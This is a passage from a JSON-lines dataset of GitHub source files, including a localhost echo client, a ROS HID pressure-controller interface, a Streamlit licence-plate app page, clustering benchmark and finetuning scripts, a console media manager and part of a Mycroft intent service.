jsonify(tasks=tasks)\n","repo_name":"SergiiButenko/automated_system","sub_path":"services/web/views/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6199789624","text":"import socket\r\nport = 1234\r\naddress = '127.0.0.1'\r\nBUF_SIZE = 1024\r\n\r\n#create a socket object name 'con'\r\ncon = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ncon.connect((address,port))\r\n\r\nmessage = \"Hello!\"\r\ncon.send(bytes(message,\"utf-8\"));\r\n\r\ndata = con.recv(BUF_SIZE)\r\ncon.close()\r\nprint(data.decode(\"utf-8\"))\r\n","repo_name":"buddhirangana/python-programming","sub_path":"Client - Server/Echo_client.py","file_name":"Echo_client.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"31841324233","text":"#!/usr/bin/env python\n\nimport numbers\nimport threading\nimport rospy\nimport time\nimport hid\n\nfrom pressure_control_interface.utils.comm_handler import build_cmd_string\n\n\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n\nclass Issue(Error):\n \"\"\"Raised when there's an issue\"\"\"\n pass\n\n\n\n\n\n\"\"\"Start serial communication\nINPUTS:\n\tdevname - the short name of the device you want to use\n\tbaud - baud rate\n\nOUTPUTS:\n\ts - the serial object created\n\"\"\"\t\nclass HIDComs:\n\tdef __init__(self, vendor_id, product_id, serial_number=None, devnum=0):\n\t\tself.connected = False\n\t\ttry:\n\t\t\tself.h = self.get_device(vendor_id, product_id, serial_number)\n\t\t\tself.devnum = devnum\n\t\t\t\n\t\t\t# enable non-blocking mode\n\t\t\tself.h.set_nonblocking(1)\n\n\t\t\tself.DEBUG = False\n\n\n\t\t\t\n\t\t\tself.connected = True\n\t\texcept:\n\t\t\tself.connected=False\n\t\t\tprint(\"HID ERROR: Maybe the device is unplugged?\")\n\t\t\tpass\n\n\n\tdef get_device(self, vendor_id, product_id, serial_number=None):\n\t\th = hid.device()\n\t\tif serial_number is None:\n\t\t\t# If no serial number is geven, open the first device with the product and vendor info\n\t\t\th.open(vendor_id, product_id) # TREZOR VendorID/ProductID\n\t\telse:\n\t\t\t# If a serial number is geven, find that device\n\t\t\tserial_number = str(serial_number)\n\t\t\tpath = None\n\t\t\tfor device_dict in hid.enumerate():\n\t\t\t\tvid = device_dict.get('vendor_id', None)\n\t\t\t\tpid = device_dict.get('product_id', None)\n\t\t\t\tsnum = device_dict.get('serial_number', None)\n\n\t\t\t\tif (vid==vendor_id) & (pid==product_id) & (snum==serial_number):\n\t\t\t\t\tpath = device_dict.get('path', None)\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\th.open_path(path) # Open HID device by path\n\t\treturn h\n\n\tdef initialize(self):\n\t\tpass # Remove this function eventually\n\n\n\tdef flushAll(self):\n\t\tpass # Remove this function eventually\n\t\t#self.h.reset_input_buffer()\n\t\t#self.h.reset_output_buffer()\n\n\n\tdef sendCommand(self, command, values, format=\"%0.2f\"):\n\t\t\"\"\"\n\t\tSend commands to the device\n\n\t\tParameters\n\t\t----------\n\t\tcommand : string\n\t\t\ta command to use\n\t\targs : list, tuple, or number\n\t\t\targuments for the command\n\t\tformat : str\n\t\t\tformat string for arguments\n\n\t\tReturns\n\t\t-------\n\t\t\tout_str - the output string sent\n\t\t\"\"\"\n\n\t\tif self.DEBUG:\n\t\t\tprint(\"HID_COMMS:\",command,values)\n\n\t\tcommand_toSend = \"\"\n\t\tif isinstance(values, list) or isinstance(values, tuple) or 
isinstance(values, numbers.Number):\n\t\t\tcommand_toSend = build_cmd_string(command, values, format)\n\n\t\telse:\n\t\t\traise ValueError('sendCommand expects either a list or a number')\n\n\n\t\t#Share the value with the main looping thread\n\t\tif not self.reader.new_command.is_set():\n\t\t\tself.reader.command_toSend = command_toSend\n\t\t\tself.reader.new_command.set()\n\n\t\treturn command_toSend\n\n\n\n\tdef start_read_thread(self, reading_cb=None, poll_rate=None):\n\t\tif not reading_cb and not poll_rate:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, devnum=self.devnum)\n\t\telif reading_cb and not poll_rate:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, reading_cb=reading_cb, devnum=self.devnum)\n\t\telif not reading_cb and poll_rate:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, poll_rate=poll_rate, devnum=self.devnum)\n\t\telse:\n\t\t\tself.reader = HIDReadWriteThreaded(self.h, reading_cb=reading_cb, poll_rate=poll_rate, devnum=self.devnum)\n\n\t\tself.reader.DEBUG= self.DEBUG\n\t\tself.reader.start_threaded()\n\n\n\n\tdef shutdown(self):\n\t\tprint(\"HID COMS: Shutting Down\")\n\t\tself.reader.shutdown()\n\n\n\n\n\n\n\n\n\n\n\nclass HIDReadWriteThreaded:\n\tdef __init__(self, hid_in, reading_cb = None, poll_rate = 2000, devnum=0):\n\t\tself.h = hid_in\n\t\tself.r = rospy.Rate(poll_rate)\n\t\tself.reading_cb = reading_cb\n\t\tself.devnum = devnum\n\n\t\tself.command_toSend = None\n\t\tself.curr_send_time = rospy.get_rostime().to_nsec()\n\t\tself.last_send_time = self.curr_send_time\n\t\tself.last_read_time = self.curr_send_time\n\t\t\n\t\tif not self.reading_cb:\n\t\t\tself.reading_cb = self.do_nothing\n\n\n\tdef do_nothing(self,line):\n\t\tprint(line)\n\n\n\tdef start_threaded(self):\n\t\tself.read_now = threading.Event()\n\t\tself.read_now.set()\n\t\tself.new_command = threading.Event()\n\t\tself.new_command.clear()\n\n\t\treading_thread = threading.Thread(target=self.thread_run)\n\t\treading_thread.start()\n\t\tprint('Communication thread started')\n\n\t\n\n\tdef thread_run(self):\n\t\twhile self.read_now.is_set() and not rospy.is_shutdown():\n\t\t\tif self.new_command.is_set():\n\t\t\t\t\n\t\t\t\tif self.DEBUG:\n\t\t\t\t\tself.curr_send_time = rospy.get_rostime().to_nsec()\n\t\t\t\t\tprint(\"SEND: %0.4f ms\"%((self.curr_send_time-self.last_send_time)/1000000.0))\n\t\t\t\t\tself.last_send_time = self.curr_send_time\n\t\t\t\t\n\t\t\t\tself.h.write( [ ord(char) for char in list(self.command_toSend)] + [0] * (64-len(self.command_toSend)))\n\t\t\t\tself.new_command.clear()\n\n\t\t\traw_reading = self.readStuff()\n\t\t\tif raw_reading is not None:\n\t\t\t\tif self.DEBUG:\n\t\t\t\t\tself.curr_read_time = rospy.get_rostime().to_nsec()\n\t\t\t\t\tprint(\"READ: %0.4f ms\"%((self.curr_read_time-self.last_read_time)/1000000.0))\n\t\t\t\t\tself.last_read_time = self.curr_read_time\n\n\t\t\t\tsendout = {'devnum':self.devnum, 'data':raw_reading}\n\t\t\t\tself.reading_cb(sendout);\n\t\t\telse:\n\t\t\t\tself.r.sleep()\n\n\n\tdef readStuff(self):\n\t\t\"\"\"read one line from the incomming buffer\n\t\tINPUTS:\n\t\t\tn/a\n\t\tOUTPUTS:\n\t\t\tout_str - the output string sent\n\t\t\"\"\"\n\t\td = self.h.read(64)\n\t\tif d:\n\t\t\tin_str = \"\"\n\t\t\tfor char_int in d:\n\t\t\t\tif char_int !=0:\n\t\t\t\t\tin_str+=chr(char_int)\n\t\t\treturn in_str\n\t\telse:\n\t\t\treturn None\n\n\tdef shutdown(self):\n\t\tprint(\"HID READER: Shutting Down\")\n\t\tself.read_now.clear()\n\t\tself.h.close()\n\n\n\n\n\n\nclass TrajThread:\n\tdef __init__(self, comm_obj, reading_cb = None, traj_rate = 
2000):\n\t\tself.comm_obj = comm_obj\n\t\tself.r = rospy.Rate(traj_rate)\n\t\tself.command_toSend = None\n\t\t\n\n\t\tif not reading_cb:\n\t\t\treading_cb = self.do_nothing\n\n\t\tself.start_thread(reading_cb)\n\n\n\tdef do_nothing(self,line):\n\t\tprint(line)\n\n\n\tdef start_thread(self, reading_cb):\n\t\tself.reading_cb = reading_cb\n\t\tself.running_now = threading.Event()\n\t\tself.running_now.set()\n\t\tself.new_command = self.comm_obj.new_command\n\n\t\ttraj_thread = threading.Thread(target=self.thread_run)\n\t\ttraj_thread.start()\n\t\tprint('Communication thread started')\n\n\t\n\n\tdef thread_run(self):\n\t\twhile self.running_now.is_set() and not rospy.is_shutdown():\n\n\n\t\t\t# Interpolate to get the next setpoint:\n\n\n\t\t\t# Actually send the setpoint if there's nothing stacked up:\n\t\t\tif not self.reader.new_command.is_set():\n\t\t\t\tself.reader.command_toSend = command_toSend\n\t\t\t\tself.new_command.set()\t\t\t\n\t\t\tself.r.sleep()\n\n\n\tdef shutdown(self):\n\t\tprint(\"HID READER: Shutting Down\")\n\t\tself.running_now.clear()","repo_name":"cbteeple/pressure_control_cbt","sub_path":"pressure_controller_ros/src/pressure_controller_ros/hardware_interface/HID_coms.py","file_name":"HID_coms.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74100865457","text":"import requests\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\n\n# Mise en page\nst.set_page_config(\n page_title=\"Page d'accueil\",\n page_icon=\"🌐\",\n layout=\"wide\",\n)\n\ndef load_lottie(url):\n r = requests.get(url)\n if r.status_code != 200:\n return None\n return r.json()\n\n\n# Navigation\nst.sidebar.title('Navigation')\nselection = st.sidebar.radio(\"Aller à\", ['Page d\\'accueil', 'Application Web'])\n\n# Page d'accueil\nif selection == 'Page d\\'accueil':\n \n # Logo, titre et description\n st.image(\"Logo.png\", width=200)\n st.title('PlateSmart')\n st.subheader('IA de reconnaissance de plaques d\\'immatriculation')\n\n st.write(\"Pour le projet de DeepLearning, nous avons décidé de faire un projet qui peut nous aider dans nos mémoires de fin d'études. Le sujet choisit est un projet ayant pour but de faire une IA qui reconnait et lit le contenu des photographie / images des plaques d\\'immatriculation de véhicules. Ce projet nous permet donc d'introduire une IA pouvant reconnaitre un certain type d'objets (les plaques) puis d'extraires un contenu (le contenu des plaques). Concrètement, l'app peut être utilisé par exemple pour ldes radars en cas d'exces de vitesse, ou des recherches + spécifiques\")\n \n lottie = load_lottie(\"https://assets5.lottiefiles.com/packages/lf20_it6c3dgk.json\")\n st_lottie(lottie, height = 250, key = \"coding\")\n \n st.markdown(\"
<p style='text-align: center;'>By Abel, Canelle, Cedric, Markclay</p>
\", unsafe_allow_html = True)\n\n \n # TRAIT DE SECTION\n #st.markdown(\"\"\"\n #---\n\n #\"\"\", unsafe_allow_html=True)\n\n# Page d'analyse de données\nelif selection == 'Application Web':\n st.title('Page de l\\'application Web')\n \n col1, col2 = st.columns([1,3])\n \n with col1:\n lottie= load_lottie(\"https://assets9.lottiefiles.com/packages/lf20_G6Lxp3nm1p.json\")\n st_lottie(lottie, height = 250, key = \"coding\")\n # ajouter le code pour l'analyse de données\n \n with col2:\n st.subheader('Fonctionnement')\n st.write(\"Le but de l'application étant de reconnaitre et lire des plaques d'immatriculation de véhicules, il parait évident que le bot se doit de savoir ce qu'est une plaque. Pour ce faire, il a du s'entrainer de nombreux cycle (INSERER LE PROCEDE DE L'ENTRAINEMENT DU BOT). Apres avoir repérer la plaque, il doit maintenant extraire le contenu de cette derniere, à savoir les caracteres et les chiffres figurant dessus. Enfin il les notes et les affiches pour que l'on puisse bien vérifier s'il n'y a pas eu d'erreur lors du traitement de la plaque.\")\n \n st.subheader('Demonstration')\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"Abel-moi/machine-learning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"43849056517","text":"\nfrom tqdm import tqdm\n\nimport argparse\nimport numpy as np\nimport os, json\nimport time \nfrom scorer.measures_scorer import *\nfrom data.reader import *\n\n\nDATASET_LIST = np.load(\"./results/dataset_list.npy\") \n\n\n\n\nscorers_dict = {\n\t\"ch\" : [\"calinski_harabasz\", calinski_scorer],\n\t\"ch_btw\" : [\"calinski_harabasz_btw\", calinski_btw_scorer],\n\t\"dunn\" : [\"dunn\", dunn_scorer],\n\t\"dunn_btw\": [\"dunn_btw\", dunn_btw_scorer],\n\t\"db\" : [\"davies_bouldin\", davies_bouldin_scorer],\n\t\"db_btw\" : [\"davies_bouldin_btw\", davies_bouldin_btw_scorer],\n\t\"ii\" : [\"i_index\", i_index_scorer],\n\t\"ii_btw\" : [\"i_index_btw\", i_index_btw_scorer],\n\t\"sil\" : [\"silhouette\", silhouette_scorer],\n\t\"sil_btw\" : [\"silhouette_btw\", silhouette_btw_scorer],\n\t\"xb\" : [\"xie_beni\", xie_beni_scorer],\n\t\"xb_btw\" : [\"xie_beni_btw\", xie_beni_btw_scorer],\n\t\"svm\" : [\"support vector machine\", svm_scorer],\n\t\"knn\" : [\"k-nearest neighbors\", knn_scorer],\n\t\"nb\" : [\"naive bayes\", nb_scorer],\n\t\"rf\" : [\"random forest\", rf_scorer],\n\t\"lr\" : [\"logistic regression\", logreg_scorer],\n\t\"lda\" : [\"linear discriminant analysis\", lda_scorer],\n\t\"mlp\" : [\"multi-layer perceptron\", mlp_scorer],\n}\n\n#### Argument handling\nparser = argparse.ArgumentParser(description=\"Obtain the CLM scores of the datasets\", formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument(\"--measure\", \"-m\", type=str, default=\"all\",\nhelp=f\"\"\"run the specified measure, or all of them if 'all'\nsupported measures: {list(scorers_dict.keys())}\"\"\"\n)\nparser.add_argument(\"--time\", \"-t\", action=\"store_true\", help=\"run time analysis\")\n\nargs = parser.parse_args()\nmeasure_args = args.measure\ntims_args = args.time\n\nnames = []\nscorers = []\nabbs = []\nif measure_args == \"all\":\n\tfor name, scorer in scorers_dict.items():\n\t\tnames.append(scorer[0])\n\t\tscorers.append(scorer[1])\n\t\tabbs.append(name)\nelse:\n\tnames.append(scorers_dict[measure_args][0])\n\tscorers.append(scorers_dict[measure_args][1])\n\tabbs.append(measure_args)\n\n\ndef 
run_measure(measure_scorer, measure_scorer_name, measure_abbreviation):\n\tscores = []\n\ttimes = []\n\tprint(\"Running \" + measure_scorer_name + \" for datasets...\")\n\tfor dataset in tqdm(DATASET_LIST):\n\t\tdata, labels = read_dataset_by_path(f\"./data/compressed/{dataset}/\")\n\t\tdata = np.array(data)\n\t\tlabels = np.array(labels)\n\t\tdata_max = np.max(data)\n\t\tdata_min = np.min(data)\n\t\tdata_norm = np.abs(data_max) if np.abs(data_max) > np.abs(data_min) else np.abs(data_min)\n\t\tdata = data / data_norm\n\n\t\tunique_labels = np.unique(labels)\n\t\tlabel_map = {old_label: new_label for new_label, old_label in enumerate(unique_labels)}\n\t\tlabels_new = np.array([label_map[old_label] for old_label in labels], dtype=np.int32)\n\n\t\tstart = time.time()\n\t\tscore = measure_scorer(data, labels_new)\n\t\tend = time.time()\n\t\ttimes.append(end - start)\n\n\t\tscores.append(score)\n\n\tprint(\"finished...saving file...\")\n\twith open(f\"./results/measures/{measure_abbreviation}_score.json\", \"w\") as f:\n\t\tjson.dump(scores, f)\n\tif tims_args:\n\t\twith open(f\"./results/measures/{measure_abbreviation}_time.json\", \"w\") as f:\n\t\t\tjson.dump(times, f)\n\tprint(\"finished!!\")\n\nfor i, name in enumerate(names):\n\trun_measure(scorers[i], name, abbs[i])","repo_name":"hj-n/clm","sub_path":"rank_analysis/measures_run.py","file_name":"measures_run.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"}
{"seq_id":"20392945223","text":"import numpy as np\nimport os\nimport sys\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nsys.path.append('..')\n\nfrom collections import OrderedDict\nfrom tools.loss import cross_entropy_loss_weighted\nimport json\n\ndef outS(i):\n j = int(i)\n j = (j+1)//2 # integer division (Python 3): the result is used as an array size\n j = int(np.ceil((j+1)/2.))\n j = (j+1)//2\n return j\n\ndef resize_label_batch(label, size):\n label_resized = np.zeros((size,size,1, 1))\n interp = nn.UpsamplingBilinear2d(size=(size, size))\n labelVar = torch.FloatTensor(label[np.newaxis, np.newaxis, :, :])\n label_resized[:, :, :, :] = interp(labelVar).data.numpy().transpose(2, 3, 1, 0)\n label_resized[label_resized>0.3] = 1\n label_resized[label_resized != 0] = 1\n\n return label_resized\n\n\nbase_lr = 0.0001\nweight_decay = 0.00005\ndef finetune(model, image, gt):\n model.train()\n #optimizer = optim.SGD([{'params': get_1x_lr_params_NOscale(model), 'lr': base_lr},\n # {'params': get_10x_lr_params(model), 'lr': 10 * base_lr}], lr=base_lr, momentum=0.9,\n # weight_decay=weight_decay)\n\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.001, momentum = 0.9, weight_decay = 0.0005)\n #optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.00001, momentum = 0.9,\n # weight_decay = 0.000005)\n optimizer.zero_grad()\n\n for i in range(200):\n flag = True\n for j in range(10):\n if flag:\n img_temp, gt_temp = aug_batch(image, gt)\n img_temp = np.expand_dims(img_temp, 0)\n gt_temp = np.expand_dims(gt_temp, 0)\n flag = False\n else:\n img_ttemp, gt_ttemp = aug_batch(image, gt)\n img_ttemp = np.expand_dims(img_ttemp, 0)\n gt_ttemp = np.expand_dims(gt_ttemp, 0)\n #print(img_temp.shape, img_ttemp.shape)\n img_temp = np.concatenate([img_temp, img_ttemp], 0)\n gt_temp = np.concatenate([gt_temp, gt_ttemp], 0)\n\n inp = torch.FloatTensor(img_temp.transpose(0,3,1,2)).cuda()\n out = model(inp)\n\n\n loss = cross_entropy_loss_weighted(out[3], torch.FloatTensor(gt_temp).cuda())\n 
loss.backward()\n\n optimizer.step()\n optimizer.zero_grad()\n\n model.eval()\n\n return model\n\n\ndef finetune_naive(model, image, gt):\n model.train()\n #optimizer = optim.SGD([{'params': get_1x_lr_params_NOscale(model), 'lr': base_lr},\n # {'params': get_10x_lr_params(model), 'lr': 10 * base_lr}], lr=base_lr, momentum=0.9,\n # weight_decay=weight_decay)\n\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.001, momentum = 0.9, weight_decay = 0.0005)\n #optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr = 0.00001, momentum = 0.9,\n # weight_decay = 0.000005)\n optimizer.zero_grad()\n\n for i in range(200):\n\n inp = torch.FloatTensor(np.expand_dims(image, 0).transpose(0,3,1,2)).cuda()\n out = model(inp)\n\n\n gta = resize_label_batch(gt, outS(321))\n loss = cross_entropy_loss_weighted(out[3], torch.FloatTensor(gta).cuda())\n loss.backward()\n\n optimizer.step()\n optimizer.zero_grad()\n\n model.eval()\n\n return model\n","repo_name":"nijkah/MaskTrack_Box","sub_path":"evaluation/finetuning.py","file_name":"finetuning.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"57"} +{"seq_id":"6628798952","text":"from ast import fix_missing_locations\r\nfrom numpy import append\r\nfrom clip import Clip\r\nfrom documentary import Documentary \r\nfrom film import Film\r\nfrom series import Series\r\nfrom media import Media\r\nfrom actor import Actor\r\n\r\nclass Main:\r\n\r\n def __init__(self):\r\n file = open('database.txt','r')\r\n line = file.read().split('\\n')\r\n self.movie = []\r\n\r\n for i in range(len(line)):\r\n info = line[i].split(',')\r\n if info[0] == 'film':\r\n self.movie.append(Film(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7]))\r\n\r\n elif info[0] == 'series':\r\n self.movie.append(Series(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7],info[8]))\r\n \r\n elif info[0] == 'clip':\r\n self.movie.append(Clip(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7])) \r\n\r\n elif info[0] == 'documentary':\r\n self.movie.append(Documentary(info[0],info[1],info[2],info[3],info[4],info[5],info[6],info[7],info[8]))\r\n \r\n \r\n file.close()\r\n Main.menu(self)\r\n\r\n def menu(self):\r\n\r\n while True:\r\n print('0.Show list')\r\n print('1.Add')\r\n print('2.Edit')\r\n print('3.Delet')\r\n print('4.Search')\r\n print('5.Advance search')\r\n print('6.Download')\r\n print('7.Exit')\r\n x = int(input('Please enter the number: '))\r\n\r\n if x == 0:\r\n Main.show_list(self)\r\n \r\n if x == 1:\r\n Main.add(self)\r\n\r\n elif x == 2:\r\n Main.edit(self)\r\n \r\n elif x == 3:\r\n Main.delete(self)\r\n\r\n elif x == 4:\r\n Main.search(self)\r\n \r\n elif x == 5:\r\n Main.search_advance(self)\r\n\r\n elif x == 6:\r\n Main.download(self)\r\n\r\n elif x == 7: \r\n Main.save(self)\r\n break\r\n \r\n def show_list(self):\r\n\r\n for i in self.movie :\r\n\r\n if i.type == 'series' or i.type == 'documentary':\r\n Series.show_info(i)\r\n \r\n else:\r\n Media.show_info(i)\r\n \r\n\r\n def add(self):\r\n new_type = input('Write type of the media: \\nfilm\\nserial\\nclip\\ndocumentry: ')\r\n new_name = input('Enter name: ')\r\n new_director = input('Enter director: ')\r\n new_imdb = input('Enter imdb score: ')\r\n new_url = input('Enter url: ')\r\n new_duration = input('Enter duration(minute): ')\r\n new_year = input('Enter year: ')\r\n new_casts = input('Enter casts: ')\r\n\r\n if new_type == 'film':\r\n 
self.movie.append(Film(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts))\r\n\r\n elif new_type == 'clip':\r\n self.movie.append(Clip(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts))\r\n\r\n elif new_type == 'series':\r\n new_part = input('Enter number of episodes: ')\r\n self.movie.append(Series(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts, new_part)) \r\n\r\n elif new_type == 'documentary' :\r\n new_part = input('Enter number of episodes: ')\r\n self.movie.append(Documentary(new_type, new_name, new_director ,new_imdb , new_url ,new_duration , new_year ,new_casts, new_part))\r\n \r\n print('add done!')\r\n \r\n def edit(self):\r\n k = 0\r\n m = input('Enter name of the movie: ')\r\n\r\n for movie in self.movie:\r\n if m == movie.name:\r\n k = 1\r\n if movie.type == 'series' :\r\n Series.edit_series(movie)\r\n elif movie.type == 'documentary':\r\n Documentary.edit_doc(movie)\r\n elif movie.type == 'film':\r\n Film.edit_film(movie)\r\n elif movie.type == 'clip':\r\n Clip.edit_clip(movie) \r\n print('Edit done') \r\n \r\n if k == 0:\r\n print('not found')\r\n\r\n def delete(self):\r\n n = input('Enter name of the movie: ')\r\n\r\n found = False\r\n for movie in self.movie :\r\n if n == movie.name :\r\n self.movie.remove(movie)\r\n print('Delete done!')\r\n found = True\r\n break\r\n\r\n # comparing the loop object to len(self.movie) could never be True; use a flag\r\n if not found:\r\n print('not found')\r\n\r\n def search(self):\r\n k = 1\r\n n = input('Enter name of the movie:')\r\n for i in self.movie :\r\n if n == i.name :\r\n Media.show_info(i)\r\n k = 0\r\n if k == 1:\r\n print('not found') \r\n\r\n def search_advance(self):\r\n k = 0\r\n a = int(input('Enter first time: '))\r\n b = int(input('Enter second time: '))\r\n\r\n for i in self.movie:\r\n if a <= int(i.duration) <= b :\r\n Media.show_info(i)\r\n k = 1\r\n if k == 0 :\r\n print('not exist') \r\n \r\n def download(self):\r\n n = input('Enter name of the movie: ')\r\n\r\n for movie in self.movie:\r\n if n == movie.name :\r\n Media.download(movie)\r\n \r\n\r\n def save(self):\r\n file = open('database.txt','w')\r\n\r\n # the loop variable is an object, so 'i != len(self.movie)-1' was always True; track the index\r\n for idx, i in enumerate(self.movie):\r\n if i.type == 'series' or i.type == 'documentary' : \r\n if idx != len(self.movie)-1 :\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts +','+ i.parts + '\\n'\r\n else:\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts +','+ i.parts \r\n file.write(str1)\r\n\r\n elif i.type == 'film' or i.type == 'clip' :\r\n if idx != len(self.movie)-1 :\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts +'\\n'\r\n else:\r\n str1 = i.type +','+ i.name +','+ i.director +','+ i.IMDBscore +','+ i.url +','+ i.duration +','+ i.year +','+ i.casts\r\n file.write(str1)\r\n \r\n file.close()\r\n\r\nMain() ","repo_name":"maryamkhoshkhoo/PythonCourse","sub_path":"Assignment10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"}
{"seq_id":"30851746022","text":"n = \"1025\"\n\ncount = 0\n\nwhile(n != '1'):\n if(int(n)%2!=0):\n x = int(n)+1\n n = str(x)\n count += 1\n else:\n count += 1\n y = int(n)//2\n n = str(y)\n\nprint(count)\n\n \n","repo_name":"yashtazor/Google-Foobar-Challenge","sub_path":"Level - 3/B - Fuel Injection Perfection/Code/LEVEL3B 
(Trial).py","file_name":"LEVEL3B (Trial).py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"3655544740","text":"from functools import lru_cache\nfrom subprocess import call\nfrom threading import Event\nfrom time import time as get_time, sleep\n\nfrom os.path import expanduser, isfile\nfrom pkg_resources import get_distribution\n\nfrom mycroft.configuration import Configuration\nfrom mycroft.messagebus.message import Message\nfrom mycroft.skills.core import FallbackSkill\nfrom mycroft.util.log import LOG\n\n\nclass PadatiousService(FallbackSkill):\n instance = None\n\n fallback_tight_match = 5 # Fallback priority for the conf > 0.8 match\n fallback_loose_match = 89 # Fallback priority for the conf > 0.5 match\n\n def __init__(self, bus, service):\n FallbackSkill.__init__(self, use_settings=False)\n if not PadatiousService.instance:\n PadatiousService.instance = self\n\n self.padatious_config = Configuration.get()['padatious']\n self.service = service\n intent_cache = expanduser(self.padatious_config['intent_cache'])\n\n try:\n from padatious import IntentContainer\n except ImportError:\n LOG.error('Padatious not installed. Please re-run dev_setup.sh')\n try:\n call(['notify-send', 'Padatious not installed',\n 'Please run build_host_setup and dev_setup again'])\n except OSError:\n pass\n return\n\n self.container = IntentContainer(intent_cache)\n\n self._bus = bus\n self.bus.on('padatious:register_intent', self.register_intent)\n self.bus.on('padatious:register_entity', self.register_entity)\n self.bus.on('detach_intent', self.handle_detach_intent)\n self.bus.on('detach_skill', self.handle_detach_skill)\n self.bus.on('mycroft.skills.initialized', self.train)\n\n # Call Padatious as an early fallback, looking for a high match intent\n self.register_fallback(self.handle_fallback,\n PadatiousService.fallback_tight_match)\n\n # Try loose Padatious intent match before going to fallback-unknown\n self.register_fallback(self.handle_fallback_last_chance,\n PadatiousService.fallback_loose_match)\n\n self.finished_training_event = Event()\n self.finished_initial_train = False\n\n self.train_delay = self.padatious_config['train_delay']\n self.train_time = get_time() + self.train_delay\n\n self.registered_intents = []\n\n def train(self, message=None):\n if message is None:\n single_thread = False\n else:\n single_thread = message.data.get('single_thread', False)\n self.finished_training_event.clear()\n\n LOG.info('Training... 
(single_thread={})'.format(single_thread))\n self.container.train(single_thread=single_thread)\n LOG.info('Training complete.')\n\n self.finished_training_event.set()\n if not self.finished_initial_train:\n LOG.info(\"Mycroft is all loaded and ready to roll!\")\n self.bus.emit(Message('mycroft.ready'))\n self.finished_initial_train = True\n\n def wait_and_train(self):\n if not self.finished_initial_train:\n return\n sleep(self.train_delay)\n if self.train_time < 0.0:\n return\n\n if self.train_time <= get_time() + 0.01:\n self.train_time = -1.0\n self.train()\n\n def __detach_intent(self, intent_name):\n self.registered_intents.remove(intent_name)\n self.container.remove_intent(intent_name)\n\n def handle_detach_intent(self, message):\n self.__detach_intent(message.data.get('intent_name'))\n\n def handle_detach_skill(self, message):\n skill_id = message.data['skill_id']\n remove_list = [i for i in self.registered_intents if skill_id in i]\n for i in remove_list:\n self.__detach_intent(i)\n\n def _register_object(self, message, object_name, register_func):\n file_name = message.data['file_name']\n name = message.data['name']\n\n LOG.debug('Registering Padatious ' + object_name + ': ' + name)\n\n if not isfile(file_name):\n LOG.warning('Could not find file ' + file_name)\n return\n\n register_func(name, file_name)\n self.train_time = get_time() + self.train_delay\n self.wait_and_train()\n\n def register_intent(self, message):\n self.registered_intents.append(message.data['name'])\n self._register_object(message, 'intent', self.container.load_intent)\n\n def register_entity(self, message):\n self._register_object(message, 'entity', self.container.load_entity)\n\n def handle_fallback(self, message, threshold=0.8):\n if not self.finished_training_event.is_set():\n LOG.debug('Waiting for Padatious training to finish...')\n return False\n\n utt = message.data.get('utterance', '')\n LOG.debug(\"Padatious fallback attempt: \" + utt)\n intent = self.calc_intent(utt)\n\n if not intent or intent.conf < threshold:\n # Attempt to use normalized() version\n norm = message.data.get('norm_utt', '')\n if norm != utt:\n LOG.debug(\" alt attempt: \" + norm)\n intent = self.calc_intent(norm)\n utt = norm\n if not intent or intent.conf < threshold:\n return False\n\n intent.matches['utterance'] = utt\n self.service.add_active_skill(intent.name.split(':')[0])\n self.bus.emit(message.reply(intent.name, data=intent.matches))\n return True\n\n def handle_fallback_last_chance(self, message):\n return self.handle_fallback(message, 0.5)\n\n # NOTE: This cache will keep a reference to this calss (PadatiousService),\n # but we can live with that since it is used as a singleton.\n @lru_cache(maxsize=2) # 2 catches both raw and normalized utts in cache\n def calc_intent(self, utt):\n return 